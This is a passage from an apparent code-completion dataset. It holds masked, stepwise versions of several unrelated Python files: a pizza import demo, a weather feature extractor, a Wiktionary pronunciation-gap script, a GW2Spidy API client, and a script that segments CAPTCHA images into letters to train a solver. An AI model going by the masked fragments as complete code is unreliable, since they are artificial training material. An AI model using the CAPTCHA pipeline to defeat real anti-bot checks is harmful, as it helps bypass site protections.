bldIndexTblCSV(csvFile)\n\tprr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate)\n\t\n\topenPRRFile = dataDir + 'openPRR_200831.csv'\n\trptOpenPRR(prr20Recent,openPRRFile)\n\n\tdeptFreqFile = dataDir + 'deptFreq2.csv'\n\trptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile)\n\t\n\tcreateDateFile = dataDir + 'createDate_200831.csv'\n\tanlyzCreateDates(prr20Recent,createDateFile)\n\t\n\tclearDateDir = dataDir + 'deptClear_200831/'\n\tanlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir)\n\t\n\topenOPDFile = dataDir + 'openOPD_200831.csv'\n\trptOpenPRR(prr20Recent,openOPDFile)\n\n\t\n\n", "step-ids": [ 10, 11, 13, 14, 16 ] }
[ 10, 11, 13, 14, 16 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> print(""" ----------导入模块中的所有函数----------""") make_pizza(16, 'pepperoni') make_pizza(12, 'mushrooms', 'green peppers', 'extra cheese') <|reserved_special_token_1|> from e19_pizza import * print(""" ----------导入模块中的所有函数----------""") make_pizza(16, 'pepperoni') make_pizza(12, 'mushrooms', 'green peppers', 'extra cheese') <|reserved_special_token_1|> from e19_pizza import * print("\n----------导入模块中的所有函数----------") # 由于导入了每个函数,可通过名称来调用每个函数,无需使用句点表示法 make_pizza(16, 'pepperoni') make_pizza(12, 'mushrooms', 'green peppers', 'extra cheese') # 注意: # 使用并非自己编写的大型模块时,最好不要采用这种导入方法,如果模块中 # 有函数的名称与你的项目中使用的名称相同,可能导致意想不到的结果。 # Python可能遇到多个名称相同的函数或变量,进而覆盖函数,而不是分别导 # 入所有的函数。 # 最佳做法: # 导入需要使用的函数,或者导入整个模块并使用句点表示法。
flexible
{ "blob_id": "c54a046ebde1be94ec87061b4fba9e22bf0f4d0a", "index": 3508, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(\"\"\"\n----------导入模块中的所有函数----------\"\"\")\nmake_pizza(16, 'pepperoni')\nmake_pizza(12, 'mushrooms', 'green peppers', 'extra cheese')\n", "step-3": "from e19_pizza import *\nprint(\"\"\"\n----------导入模块中的所有函数----------\"\"\")\nmake_pizza(16, 'pepperoni')\nmake_pizza(12, 'mushrooms', 'green peppers', 'extra cheese')\n", "step-4": "from e19_pizza import *\n\nprint(\"\\n----------导入模块中的所有函数----------\")\n# 由于导入了每个函数,可通过名称来调用每个函数,无需使用句点表示法\n\nmake_pizza(16, 'pepperoni')\nmake_pizza(12, 'mushrooms', 'green peppers', 'extra cheese')\n\n# 注意:\n# 使用并非自己编写的大型模块时,最好不要采用这种导入方法,如果模块中\n# 有函数的名称与你的项目中使用的名称相同,可能导致意想不到的结果。\n# Python可能遇到多个名称相同的函数或变量,进而覆盖函数,而不是分别导\n# 入所有的函数。\n\n# 最佳做法:\n# 导入需要使用的函数,或者导入整个模块并使用句点表示法。\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import numpy as np from feature.features import Features class RealWorldFeatures(Features): def __init__(self): super().__init__('tsagkias/real_world_features') def _extract_features(self, df): # weather from http://www.dwd.de/DE/leistungen/klimadatendeutschland/klimadatendeutschland.html features = [ df['temp_ham'], df['temp_fra'], df['temp_ber'], df['hum_ham'], df['hum_fra'], df['hum_ber'], ] return np.vstack(features).T
normal
{ "blob_id": "f6b2e66379b483c6a573d34d73ae0d10de7315a3", "index": 6815, "step-1": "<mask token>\n\n\nclass RealWorldFeatures(Features):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass RealWorldFeatures(Features):\n\n def __init__(self):\n super().__init__('tsagkias/real_world_features')\n <mask token>\n", "step-3": "<mask token>\n\n\nclass RealWorldFeatures(Features):\n\n def __init__(self):\n super().__init__('tsagkias/real_world_features')\n\n def _extract_features(self, df):\n features = [df['temp_ham'], df['temp_fra'], df['temp_ber'], df[\n 'hum_ham'], df['hum_fra'], df['hum_ber']]\n return np.vstack(features).T\n", "step-4": "import numpy as np\nfrom feature.features import Features\n\n\nclass RealWorldFeatures(Features):\n\n def __init__(self):\n super().__init__('tsagkias/real_world_features')\n\n def _extract_features(self, df):\n features = [df['temp_ham'], df['temp_fra'], df['temp_ber'], df[\n 'hum_ham'], df['hum_fra'], df['hum_ber']]\n return np.vstack(features).T\n", "step-5": "import numpy as np\nfrom feature.features import Features\n\nclass RealWorldFeatures(Features):\n def __init__(self):\n super().__init__('tsagkias/real_world_features')\n\n def _extract_features(self, df):\n # weather from http://www.dwd.de/DE/leistungen/klimadatendeutschland/klimadatendeutschland.html\n\n features = [\n df['temp_ham'],\n df['temp_fra'],\n df['temp_ber'],\n df['hum_ham'],\n df['hum_fra'],\n df['hum_ber'],\n ]\n\n return np.vstack(features).T\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from datetime import datetime from iohelpers import lines_to_textfile from typing import Iterator, List, Sequence from zhmodules import ZhTopolectSynonyms, MandarinPronunciations, ZhTopolectPronunciations def missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms, hokprons: ZhTopolectPronunciations): all_hokkien = set() for word, syn_data in synonyms.all_words(): minnan = set(syn_data['Philippine-MN']) minnan.update(syn_data['Quanzhou']) minnan.update(syn_data['Xiamen']) for hokkien in minnan: banlamoe = hokkien.split(':') all_hokkien.add(banlamoe[0]) return words_missing_prons(all_hokkien, hokprons) def words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations): return [word for word in corpus if prons.pronunciation(word) is None and all(ord(char) > 255 for char in word)] if __name__ == '__main__': synonyms = ZhTopolectSynonyms.from_local_folder('../data/enwiktionary/module-zh-data-json/dial-syn') mp = MandarinPronunciations.from_local_json_file('../data/enwiktionary/module-zh-data-json/combined-mandarin-pron.json') missing_mandarin_prons = iter(words_missing_prons(synonyms.mandarin_words(), mp)) h = ZhTopolectPronunciations.from_local_json_folder('../data/enwiktionary/module-zh-data-json/nan-pron') missing_hokkien_prons = iter(missing_philippine_hokkien_words_generator(synonyms, h)) today = datetime.today().strftime("%Y%m%d") lines_to_textfile(f'../data/enwiktionary/words-search/missing-hokkien.{today}.txt', missing_hokkien_prons) lines_to_textfile(f'../data/enwiktionary/words-search/missing-mandarin.{today}.txt', missing_mandarin_prons)
normal
{ "blob_id": "18366633489d905c96b0c30d65442bc2e2b188ea", "index": 4703, "step-1": "<mask token>\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms,\n hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n return words_missing_prons(all_hokkien, hokprons)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms,\n hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n return words_missing_prons(all_hokkien, hokprons)\n\n\ndef words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations\n ):\n return [word for word in corpus if prons.pronunciation(word) is None and\n all(ord(char) > 255 for char in word)]\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms,\n hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n return words_missing_prons(all_hokkien, hokprons)\n\n\ndef words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations\n ):\n return [word for word in corpus if prons.pronunciation(word) is None and\n all(ord(char) > 255 for char in word)]\n\n\nif __name__ == '__main__':\n synonyms = ZhTopolectSynonyms.from_local_folder(\n '../data/enwiktionary/module-zh-data-json/dial-syn')\n mp = MandarinPronunciations.from_local_json_file(\n '../data/enwiktionary/module-zh-data-json/combined-mandarin-pron.json')\n missing_mandarin_prons = iter(words_missing_prons(synonyms.\n mandarin_words(), mp))\n h = ZhTopolectPronunciations.from_local_json_folder(\n '../data/enwiktionary/module-zh-data-json/nan-pron')\n missing_hokkien_prons = iter(missing_philippine_hokkien_words_generator\n (synonyms, h))\n today = datetime.today().strftime('%Y%m%d')\n lines_to_textfile(\n f'../data/enwiktionary/words-search/missing-hokkien.{today}.txt',\n missing_hokkien_prons)\n lines_to_textfile(\n f'../data/enwiktionary/words-search/missing-mandarin.{today}.txt',\n missing_mandarin_prons)\n", "step-4": "from datetime import datetime\nfrom iohelpers import lines_to_textfile\nfrom typing import Iterator, List, Sequence\nfrom zhmodules import ZhTopolectSynonyms, MandarinPronunciations, ZhTopolectPronunciations\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms,\n hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n return words_missing_prons(all_hokkien, hokprons)\n\n\ndef words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations\n ):\n return [word for word in corpus if prons.pronunciation(word) is None and\n all(ord(char) > 255 for char in word)]\n\n\nif __name__ == '__main__':\n synonyms = ZhTopolectSynonyms.from_local_folder(\n '../data/enwiktionary/module-zh-data-json/dial-syn')\n mp = MandarinPronunciations.from_local_json_file(\n '../data/enwiktionary/module-zh-data-json/combined-mandarin-pron.json')\n missing_mandarin_prons = iter(words_missing_prons(synonyms.\n mandarin_words(), mp))\n h = ZhTopolectPronunciations.from_local_json_folder(\n '../data/enwiktionary/module-zh-data-json/nan-pron')\n missing_hokkien_prons = iter(missing_philippine_hokkien_words_generator\n (synonyms, h))\n today = datetime.today().strftime('%Y%m%d')\n lines_to_textfile(\n f'../data/enwiktionary/words-search/missing-hokkien.{today}.txt',\n missing_hokkien_prons)\n lines_to_textfile(\n f'../data/enwiktionary/words-search/missing-mandarin.{today}.txt',\n missing_mandarin_prons)\n", "step-5": "from datetime import datetime\nfrom iohelpers import lines_to_textfile\nfrom typing import Iterator, List, Sequence\nfrom zhmodules import ZhTopolectSynonyms, MandarinPronunciations, ZhTopolectPronunciations\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms, hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n\n return words_missing_prons(all_hokkien, hokprons)\n\n\ndef words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations):\n return [word for word in corpus if prons.pronunciation(word) is None and all(ord(char) > 255 for char in word)]\n\n\nif __name__ == '__main__':\n synonyms = ZhTopolectSynonyms.from_local_folder('../data/enwiktionary/module-zh-data-json/dial-syn')\n\n mp = MandarinPronunciations.from_local_json_file('../data/enwiktionary/module-zh-data-json/combined-mandarin-pron.json')\n missing_mandarin_prons = iter(words_missing_prons(synonyms.mandarin_words(), mp))\n h = ZhTopolectPronunciations.from_local_json_folder('../data/enwiktionary/module-zh-data-json/nan-pron')\n missing_hokkien_prons = iter(missing_philippine_hokkien_words_generator(synonyms, h))\n\n today = datetime.today().strftime(\"%Y%m%d\")\n lines_to_textfile(f'../data/enwiktionary/words-search/missing-hokkien.{today}.txt', missing_hokkien_prons)\n lines_to_textfile(f'../data/enwiktionary/words-search/missing-mandarin.{today}.txt', missing_mandarin_prons)\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jul 19 09:31:20 2021 @author: dclabby """ import os import cv2 import pickle from utils import locateLetterRegions # # Constants # sourceFolder = '/home/dclabby/Documents/Springboard/HDAIML_SEP/Semester03/MachineLearning/Project/solving_captchas_code_examples/solving_captchas_code_examples/generated_captcha_images/' # destFolder = './data/separateLetters' # trainRatio = 0.8 # proportion of data set that will be used for training & validation (i.e. 1 - testRatio) def extractLetters(sourceFolder, trainRatio=0.8, destFolder='./data/separateLetters'): """ Parameters ---------- sourceFolder : string DESCRIPTION. trainRatio : float, optional DESCRIPTION. The default is 0.8. destFolder : string, optional DESCRIPTION. The default is './data/separateLetters'. Returns ------- None. """ letterCounts = {} # Get a list of all the captcha images to be processed capImages = os.listdir(sourceFolder) # loop over the image paths nImages = len(capImages) # note: the original script uses all images for training (train/test split is implemented later, but test data is actually used for validation) # therefore, should make a train/test split here & keep the test data separate iSplit = int(nImages*trainRatio) trainTestSplit = [capImages[:iSplit], capImages[iSplit:]] # [train, test] # save the list of training and test data, so that test data can be identified later with open('trainTestSplit.dat', "wb") as f: pickle.dump(trainTestSplit, f) # with open('trainTestSplit.dat', "rb") as f: # trainTestSplit = pickle.load(f) nTrain = len(trainTestSplit[0]) for (iImage, capImage) in enumerate(trainTestSplit[0]):#enumerate(capImages): print('Processing image ' + str(iImage+1) + ' of ' + str(nTrain))#str(nImages)) # Separate the filename from its extension, and use filename as the captcha's label (i.e. "2A2X.png" -> "2A2X") capLabel = capImage.split('.')[0] # Load image # imageData = cv2.imread(sourceFolder + capImage) imageData = cv2.imread(os.path.join(sourceFolder, capImage)) #cv2.imshow(capLabel + ' - original', imageData) # Convert to grayscale imageData = cv2.cvtColor(imageData, cv2.COLOR_BGR2GRAY) #cv2.imshow(capLabel + ' - gray', imageData) # Add padding imageData = cv2.copyMakeBorder(imageData, 8, 8, 8, 8, cv2.BORDER_REPLICATE) #cv2.imshow(capLabel + ' - padding', imageData) # Locate letter regions letterRegions = locateLetterRegions(imageData) # If the number of contours does not equal the number of letters in the label it is concluded that letter extraction # was not successful, and this example will not be used in training data if len(letterRegions) != len(capLabel): continue # Save each letter as a separate image for letterRegion, letterLabel in zip(letterRegions, capLabel): # Get coordinates (x, y) and dimensions (w, h) of letter region x, y, w, h = letterRegion # extract the letter from the original image letterImage = imageData[y:y + h, x:x + w] # # extract the letter from the original image, with a 2 pixel margin # letterImage = imageData[y - 2:y + h + 2, x - 2:x + w + 2] # note: image data arranged with rows corresponding to the vertical (y), & columns corresponding to the horizontal (x) #cv2.imshow(letterLabel, letterImage) # define folder path where letters will be saved & create folder if it does not exist savePath = os.path.join(destFolder, letterLabel) if not os.path.exists(savePath): os.makedirs(savePath) # initialize or increment the letterCounts dictionary for the key corresponding to the present letter if letterLabel not in letterCounts: letterCounts[letterLabel] = 1 else: letterCounts[letterLabel] += 1 letterCount = letterCounts[letterLabel] # write the letter image to a file based on its letter count fileName = os.path.join(savePath, "{}.png".format(str(letterCount).zfill(6))) cv2.imwrite(fileName, letterImage)
normal
{ "blob_id": "6109efeb3462ac2c5a94a68fbfa4f2f0617dd927", "index": 1221, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef extractLetters(sourceFolder, trainRatio=0.8, destFolder=\n './data/separateLetters'):\n \"\"\" \n\n Parameters\n ----------\n sourceFolder : string\n DESCRIPTION.\n trainRatio : float, optional\n DESCRIPTION. The default is 0.8.\n destFolder : string, optional\n DESCRIPTION. The default is './data/separateLetters'.\n\n Returns\n -------\n None.\n\n \"\"\"\n letterCounts = {}\n capImages = os.listdir(sourceFolder)\n nImages = len(capImages)\n iSplit = int(nImages * trainRatio)\n trainTestSplit = [capImages[:iSplit], capImages[iSplit:]]\n with open('trainTestSplit.dat', 'wb') as f:\n pickle.dump(trainTestSplit, f)\n nTrain = len(trainTestSplit[0])\n for iImage, capImage in enumerate(trainTestSplit[0]):\n print('Processing image ' + str(iImage + 1) + ' of ' + str(nTrain))\n capLabel = capImage.split('.')[0]\n imageData = cv2.imread(os.path.join(sourceFolder, capImage))\n imageData = cv2.cvtColor(imageData, cv2.COLOR_BGR2GRAY)\n imageData = cv2.copyMakeBorder(imageData, 8, 8, 8, 8, cv2.\n BORDER_REPLICATE)\n letterRegions = locateLetterRegions(imageData)\n if len(letterRegions) != len(capLabel):\n continue\n for letterRegion, letterLabel in zip(letterRegions, capLabel):\n x, y, w, h = letterRegion\n letterImage = imageData[y:y + h, x:x + w]\n savePath = os.path.join(destFolder, letterLabel)\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n if letterLabel not in letterCounts:\n letterCounts[letterLabel] = 1\n else:\n letterCounts[letterLabel] += 1\n letterCount = letterCounts[letterLabel]\n fileName = os.path.join(savePath, '{}.png'.format(str(\n letterCount).zfill(6)))\n cv2.imwrite(fileName, letterImage)\n", "step-3": "<mask token>\nimport os\nimport cv2\nimport pickle\nfrom utils import locateLetterRegions\n\n\ndef extractLetters(sourceFolder, trainRatio=0.8, destFolder=\n './data/separateLetters'):\n \"\"\" \n\n Parameters\n ----------\n sourceFolder : string\n DESCRIPTION.\n trainRatio : float, optional\n DESCRIPTION. The default is 0.8.\n destFolder : string, optional\n DESCRIPTION. The default is './data/separateLetters'.\n\n Returns\n -------\n None.\n\n \"\"\"\n letterCounts = {}\n capImages = os.listdir(sourceFolder)\n nImages = len(capImages)\n iSplit = int(nImages * trainRatio)\n trainTestSplit = [capImages[:iSplit], capImages[iSplit:]]\n with open('trainTestSplit.dat', 'wb') as f:\n pickle.dump(trainTestSplit, f)\n nTrain = len(trainTestSplit[0])\n for iImage, capImage in enumerate(trainTestSplit[0]):\n print('Processing image ' + str(iImage + 1) + ' of ' + str(nTrain))\n capLabel = capImage.split('.')[0]\n imageData = cv2.imread(os.path.join(sourceFolder, capImage))\n imageData = cv2.cvtColor(imageData, cv2.COLOR_BGR2GRAY)\n imageData = cv2.copyMakeBorder(imageData, 8, 8, 8, 8, cv2.\n BORDER_REPLICATE)\n letterRegions = locateLetterRegions(imageData)\n if len(letterRegions) != len(capLabel):\n continue\n for letterRegion, letterLabel in zip(letterRegions, capLabel):\n x, y, w, h = letterRegion\n letterImage = imageData[y:y + h, x:x + w]\n savePath = os.path.join(destFolder, letterLabel)\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n if letterLabel not in letterCounts:\n letterCounts[letterLabel] = 1\n else:\n letterCounts[letterLabel] += 1\n letterCount = letterCounts[letterLabel]\n fileName = os.path.join(savePath, '{}.png'.format(str(\n letterCount).zfill(6)))\n cv2.imwrite(fileName, letterImage)\n", "step-4": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 19 09:31:20 2021\n\n@author: dclabby\n\"\"\"\nimport os\nimport cv2\nimport pickle\nfrom utils import locateLetterRegions\n\n# # Constants\n# sourceFolder = '/home/dclabby/Documents/Springboard/HDAIML_SEP/Semester03/MachineLearning/Project/solving_captchas_code_examples/solving_captchas_code_examples/generated_captcha_images/'\n# destFolder = './data/separateLetters'\n# trainRatio = 0.8 # proportion of data set that will be used for training & validation (i.e. 1 - testRatio)\n\ndef extractLetters(sourceFolder, trainRatio=0.8, destFolder='./data/separateLetters'):\n \"\"\" \n\n Parameters\n ----------\n sourceFolder : string\n DESCRIPTION.\n trainRatio : float, optional\n DESCRIPTION. The default is 0.8.\n destFolder : string, optional\n DESCRIPTION. The default is './data/separateLetters'.\n\n Returns\n -------\n None.\n\n \"\"\"\n \n letterCounts = {}\n \n # Get a list of all the captcha images to be processed\n capImages = os.listdir(sourceFolder)\n \n # loop over the image paths\n nImages = len(capImages) \n # note: the original script uses all images for training (train/test split is implemented later, but test data is actually used for validation)\n # therefore, should make a train/test split here & keep the test data separate\n iSplit = int(nImages*trainRatio)\n trainTestSplit = [capImages[:iSplit], capImages[iSplit:]] # [train, test]\n \n # save the list of training and test data, so that test data can be identified later\n with open('trainTestSplit.dat', \"wb\") as f:\n pickle.dump(trainTestSplit, f)\n # with open('trainTestSplit.dat', \"rb\") as f:\n # trainTestSplit = pickle.load(f)\n \n nTrain = len(trainTestSplit[0])\n for (iImage, capImage) in enumerate(trainTestSplit[0]):#enumerate(capImages):\n print('Processing image ' + str(iImage+1) + ' of ' + str(nTrain))#str(nImages))\n \n # Separate the filename from its extension, and use filename as the captcha's label (i.e. \"2A2X.png\" -> \"2A2X\")\n capLabel = capImage.split('.')[0]\n \n # Load image\n # imageData = cv2.imread(sourceFolder + capImage)\n imageData = cv2.imread(os.path.join(sourceFolder, capImage))\n #cv2.imshow(capLabel + ' - original', imageData)\n \n # Convert to grayscale\n imageData = cv2.cvtColor(imageData, cv2.COLOR_BGR2GRAY)\n #cv2.imshow(capLabel + ' - gray', imageData) \n \n # Add padding\n imageData = cv2.copyMakeBorder(imageData, 8, 8, 8, 8, cv2.BORDER_REPLICATE)\n #cv2.imshow(capLabel + ' - padding', imageData) \n \n # Locate letter regions\n letterRegions = locateLetterRegions(imageData)\n \n # If the number of contours does not equal the number of letters in the label it is concluded that letter extraction\n # was not successful, and this example will not be used in training data\n if len(letterRegions) != len(capLabel):\n continue\n \n # Save each letter as a separate image\n for letterRegion, letterLabel in zip(letterRegions, capLabel):\n # Get coordinates (x, y) and dimensions (w, h) of letter region\n x, y, w, h = letterRegion\n \n # extract the letter from the original image\n letterImage = imageData[y:y + h, x:x + w] \n # # extract the letter from the original image, with a 2 pixel margin\n # letterImage = imageData[y - 2:y + h + 2, x - 2:x + w + 2] # note: image data arranged with rows corresponding to the vertical (y), & columns corresponding to the horizontal (x) \n #cv2.imshow(letterLabel, letterImage) \n \n # define folder path where letters will be saved & create folder if it does not exist\n savePath = os.path.join(destFolder, letterLabel)\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n \n # initialize or increment the letterCounts dictionary for the key corresponding to the present letter\n if letterLabel not in letterCounts:\n letterCounts[letterLabel] = 1\n else:\n letterCounts[letterLabel] += 1\n letterCount = letterCounts[letterLabel]\n \n # write the letter image to a file based on its letter count\n fileName = os.path.join(savePath, \"{}.png\".format(str(letterCount).zfill(6)))\n cv2.imwrite(fileName, letterImage)\n \n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright (c) 2012 - Samuel Loretan <tynril at gmail.com> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import urllib2 try: import json except ImportError: import simplejson as json class Gw2Spidy: """This utility class allows easy access to the GW2Spidy data.""" headers = {'User-Agent': 'gw2spidy.py'} @staticmethod def getTypesList(): """Get a list of item types and subtypes.""" return Gw2Spidy._request('types')['results'] @staticmethod def getDisciplinesList(): """Get a list of crafting disciplines.""" return Gw2Spidy._request('disciplines')['results'] @staticmethod def getRaritiesList(): """Get a list of item rarities.""" return Gw2Spidy._request('rarities')['results'] @staticmethod def getAllItemsList(): """Get a list of all items.""" return Gw2Spidy._request('all-items', 'all')['results'] @staticmethod def getItemsOfType(typeId): """Get a list of all items of a certain type.""" return Gw2Spidy._request('all-items', str(typeId))['results'] @staticmethod def getItemData(itemId): """Get the data of a particular item. High frequency of update.""" return Gw2Spidy._request('item', str(itemId))['result'] @staticmethod def getItemBuyListings(itemId, allPages = False): """Get a list of all buy offers for a certain item.""" return Gw2Spidy._paginatedRequest(allPages, 'listings', str(itemId), 'buy') @staticmethod def getItemSellListings(itemId, allPages = False): """Get a list of all sell offers for a certain item.""" return Gw2Spidy._paginatedRequest(allPages, 'listings', str(itemId), 'sell') @staticmethod def searchItems(name, allPages = False): """Search items by name. Might be slow, not recommended.""" return Gw2Spidy._paginatedRequest(allPages, 'item-search', name) @staticmethod def getAllRecipesList(allPages = False): """Get a list of all crafting recipes.""" return Gw2Spidy._paginatedRequest(allPages, 'recipes', 'all') @staticmethod def getRecipesOfDiscipline(disciplineId, allPages = False): """Get a list of all crafting recipes for a certain discipline.""" return Gw2Spidy._paginatedRequest(allPages, 'recipes', str(disciplineId)) @staticmethod def getRecipeData(recipeId): """Get the data of a particular recipe.""" return Gw2Spidy._request('recipe', str(recipeId)) @staticmethod def getGemPrice(): """Get the current gem/gold conversion rate.""" return Gw2Spidy._request('gem-price') @staticmethod def _paginatedRequest(allPages, *args): """Handle paginated requests, downloading all pages if requested.""" data = [] currentPage = 0 while True: newData = Gw2Spidy._request(*(args + (str(currentPage),))) if not allPages: return newData['results'] data.extend(newData['results']) currentPage = currentPage + 1 if newData['page'] == newData['last_page']: break return data @staticmethod def _request(*args): """Makes a request on the GW2Spidy API.""" url = 'http://www.gw2spidy.com/api/v0.9/json/' + '/'.join(args) r = urllib2.Request(url, headers=Gw2Spidy.headers) if 'Cookie' not in Gw2Spidy.headers: resp = urllib2.urlopen(r) if 'set-cookie' in resp.headers: Gw2Spidy.headers['Cookie'] = resp.headers['set-cookie'].split(';', 1)[0] return json.loads(resp.read()) return json.loads(urllib2.urlopen(r).read())
normal
{ "blob_id": "109a0ba0952bd5923ecbefa41556de7aa9f9eea8", "index": 4197, "step-1": "# Copyright (c) 2012 - Samuel Loretan <tynril at gmail.com>\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport urllib2\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nclass Gw2Spidy:\n \"\"\"This utility class allows easy access to the GW2Spidy data.\"\"\"\n headers = {'User-Agent': 'gw2spidy.py'}\n\n @staticmethod\n def getTypesList():\n \"\"\"Get a list of item types and subtypes.\"\"\"\n return Gw2Spidy._request('types')['results']\n\n @staticmethod\n def getDisciplinesList():\n \"\"\"Get a list of crafting disciplines.\"\"\"\n return Gw2Spidy._request('disciplines')['results']\n\n @staticmethod\n def getRaritiesList():\n \"\"\"Get a list of item rarities.\"\"\"\n return Gw2Spidy._request('rarities')['results']\n\n @staticmethod\n def getAllItemsList():\n \"\"\"Get a list of all items.\"\"\"\n return Gw2Spidy._request('all-items', 'all')['results']\n\n @staticmethod\n def getItemsOfType(typeId):\n \"\"\"Get a list of all items of a certain type.\"\"\"\n return Gw2Spidy._request('all-items', str(typeId))['results']\n\n @staticmethod\n def getItemData(itemId):\n \"\"\"Get the data of a particular item. High frequency of update.\"\"\"\n return Gw2Spidy._request('item', str(itemId))['result']\n\n @staticmethod\n def getItemBuyListings(itemId, allPages = False):\n \"\"\"Get a list of all buy offers for a certain item.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'listings', str(itemId), 'buy')\n\n @staticmethod\n def getItemSellListings(itemId, allPages = False):\n \"\"\"Get a list of all sell offers for a certain item.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'listings', str(itemId), 'sell')\n\n @staticmethod\n def searchItems(name, allPages = False):\n \"\"\"Search items by name. Might be slow, not recommended.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'item-search', name)\n\n @staticmethod\n def getAllRecipesList(allPages = False):\n \"\"\"Get a list of all crafting recipes.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'recipes', 'all')\n\n @staticmethod\n def getRecipesOfDiscipline(disciplineId, allPages = False):\n \"\"\"Get a list of all crafting recipes for a certain discipline.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'recipes', str(disciplineId))\n\n @staticmethod\n def getRecipeData(recipeId):\n \"\"\"Get the data of a particular recipe.\"\"\"\n return Gw2Spidy._request('recipe', str(recipeId))\n\n @staticmethod\n def getGemPrice():\n \"\"\"Get the current gem/gold conversion 